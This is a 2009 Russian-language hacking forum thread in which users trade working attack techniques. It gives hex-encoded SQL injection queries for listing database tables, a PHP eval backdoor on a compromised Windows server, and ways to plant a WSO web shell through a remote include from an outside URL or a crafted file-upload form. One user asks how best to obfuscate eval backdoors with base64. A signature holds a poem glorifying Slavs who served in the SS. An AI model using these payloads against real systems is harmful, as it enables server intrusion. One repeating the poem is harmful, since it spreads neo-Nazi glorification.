09.12.2009, 12:19
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
С нами:
9837719
Репутация:
466
|
|
2Strilo4ka
так фильтрацию обходить
|
|
|
09.12.2009, 12:55
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от Rubaka
2Strilo4ka
так фильтрацию обходить
Какую? Фильтрацию чего так можно обойти?
Сообщение от _gr34t
фильтрацию кавычек
например если такой запрос не проходит из-за того, что кавычки фильтруются
SELECT table_name FROM information_schema.tables WHERE table_schema='forum'
, то такой пройдёт
SELECT table_name FROM information_schema.tables WHERE table_schema=unhex(hex(0x666f72756d))
Господа, если не знаете что ответить или не уверены, не нужно этого делать, я уже по 100 раз всех просил об этом.
========================
Strilo4ka
Это делается для получения результата в "правильной" кодировке, и никакую фильтрацию это обойти не позволит. Ты наконец прочитаешь хоть какую-нибудь статью, или так и будет это продолжаться?
|
|
|
|
09.12.2009, 12:19
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами:
9231812
Репутация:
40
|
|
фильтрацию кавычек
например если такой запрос не проходит из-за того, что кавычки фильтруются
SELECT table_name FROM information_schema.tables WHERE table_schema='forum'
, то такой пройдёт
SELECT table_name FROM information_schema.tables WHERE table_schema=unhex(hex(0x666f72756d))
|
|
|
|
09.12.2009, 12:53
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
С нами:
10021597
Репутация:
905
|
|
Зачем, если можно
Код:
SELECT table_name FROM information_schema.tables WHERE table_schema=0x666f72756d
? |
|
|
|
09.12.2009, 17:28
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Как залить шелл, например WSO, если я имею такой шелл <?php eval($_GET['c']) ?>
OC win , стоит VertrigoServ
Почему то я замешкался вот тут:
confgs.php?e=ls; не выводит список файлов
confgs.php?e=pwd; тож нехочет показывать, но показывает phpinfo()
confgs.php?e=phpinfo();
Последний раз редактировалось SeNaP; 09.12.2009 в 17:35..
|
|
|
|
09.12.2009, 17:48
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
eval позволяет выполнять php-код, ls - никакого отношения к php не имеет. Вывод - нужно написать PHP-код, с помощью которого можно будет залить шелл.
Например, если после просмотра phpinfo() там будет allow_url_include = ON, то можно так залить шелл:
confgs.php?e=include('http://site/shell.txt');
|
|
|
|
09.12.2009, 18:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от Pashkela
eval позволяет выполнять php-код, ls - никакого отношения к php не имеет. Вывод - нужно написать PHP-код, с помощью которого можно будет залить шелл.
Например, если после просмотра phpinfo() там будет allow_url_include = ON, то можно так залить шелл:
confgs.php?e=include('http://site/shell.txt');
Оо ну это все понятно а если confgs.php?e=system('ls -lia /путь/какой/нибудь'); не как? 
ЗЫ а там вообще WIN вместо ls у него dir вроде
Как залить шелл, например WSO, если я имею такой шелл <?php eval($_GET['c']) ?>
старайся всегда делать Как залить шелл, например WSO, если я имею такой шелл <?php eval(stripslashes($_GET['c'])); ?> ибо MQ = On может помешать и то что написал пашкела про include('http://site/shell.txt')
и если Magic_quotes = on то он его побреет этот запрос , или я не прав
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
Последний раз редактировалось HAXTA4OK; 09.12.2009 в 18:27..
|
|
|
|
09.12.2009, 18:27
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
какие ls,pwd внимательнее:
OC win , стоит VertrigoServ
создай на своем компе:
<form enctype=multipart/form-data method=post action="http://lala/confgs.php?e=$f=$_FILES[x];copy($f[tmp_name],$f[name]);"><input type=file name=x><input type=submit></form>
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
Последний раз редактировалось l1ght; 09.12.2009 в 18:40..
|
|
|
|
09.12.2009, 18:29
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от HAXTA4OK
Оо ну это все понятно а если confgs.php?e=system('ls -lia /путь/какой/нибудь'); не как?
ЗЫ а там вообще WIN вместо ls у него dir вроде
старайся всегда делать Как залить шелл, например WSO, если я имею такой шелл <?php eval(stripslashes($_GET['c'])); ?> ибо MQ = On может помешать и то что написал пашкела про include('http://site/shell.txt')
и если Magic_quotes = on то он его побреет этот запрос , или я не прав magic_quotes_gpc On On 
Сообщение от l1ght
какие ls,pwd внимательнее:
создай на своем компе:
А можно поподробние?
Последний раз редактировалось SeNaP; 09.12.2009 в 18:39..
|
|
|
|
09.12.2009, 18:33
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами:
10018169
Репутация:
1680
|
|
Да, забыл уточнить, когда делаем шелл в скриптах через Eval, то как лучше делать ?
Eval(stripslashes());
или
Eval(base64_decode());
Что посоветуете из этого? Я склоняюсь ко второму варианту но... хз хз
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
